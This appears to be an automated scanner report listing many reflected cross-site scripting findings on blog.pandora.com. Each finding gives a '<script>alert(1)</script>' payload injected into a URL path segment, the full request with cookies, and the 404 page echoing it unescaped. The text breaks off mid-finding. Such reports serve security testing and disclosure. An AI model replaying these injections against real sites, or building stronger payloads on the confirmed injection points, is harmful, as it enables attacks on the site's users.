HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc983<script>alert(1)</script>2400c298808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de66<script>alert(1)</script>475006746a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e9cf<script>alert(1)</script>65e022c3582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61fb7<script>alert(1)</script>7b57931b113 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b45c8<script>alert(1)</script>6c1d1e3fb41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c321c<script>alert(1)</script>4ec169aa6ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa813<script>alert(1)</script>ceeadd94af1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57830<script>alert(1)</script>60d006b3a3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23646<script>alert(1)</script>c3ee8c2d938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b658<script>alert(1)</script>a757f005820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 490a0<script>alert(1)</script>2b229393208 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8018f<script>alert(1)</script>0037f1ec75a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb4ba<script>alert(1)</script>cf73c74ede8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d94d<script>alert(1)</script>f0d1317d4a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7e3f<script>alert(1)</script>451f1300ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb7b3<script>alert(1)</script>c9a6d62cd0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cc96<script>alert(1)</script>7c02a0cfd8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d407f<script>alert(1)</script>90eda7c143c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff848<script>alert(1)</script>e2df3910455 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edb24<script>alert(1)</script>4f85795b56c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
